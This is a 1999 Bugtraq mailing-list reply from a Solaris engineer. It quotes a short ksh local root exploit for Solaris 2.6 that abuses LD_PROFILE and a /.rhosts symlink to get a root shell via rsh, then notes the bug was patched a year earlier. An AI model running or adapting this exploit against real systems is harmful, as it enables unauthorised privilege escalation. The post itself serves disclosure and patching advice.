Bugtraq mailing list archives
Re: LD_PROFILE local root exploit for solaris 2.6
From: darren.moffat () SUNUK UK SUN COM (Darren Moffat - Solaris Sustaining Engineering)
Date: Fri, 24 Sep 1999 10:00:46 +0100
works on solaris 2.6 sparc anyway... #! /bin/ksh # LD_PROFILE local root exploit for solaris # steve () tightrope demon co uk 19990922 umask 000 ln -s /.rhosts /var/tmp/ps.profile export LD_PROFILE=/usr/bin/ps /usr/bin/ps echo + + > /.rhosts rsh -l root localhost csh -i
This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher), which was released over 1 year ago (Sep/10/98)! Patch 105490-07 is in the current recommened patch set for Solaris 2.6, so it is publicly available. I strongly recommend that people apply the latest recommended and security patch sets when testing out security exploits. That way you won't send out information about exploits which have been long fixed and needlessly panic people. -- Darren J Moffat
Current thread:
- Re: LD_PROFILE local root exploit for solaris 2.6 Darren Moffat - Solaris Sustaining Engineering (Sep 24)
- Re: LD_PROFILE local root exploit for solaris 2.6 Valdis.Kletnieks () VT EDU (Sep 26)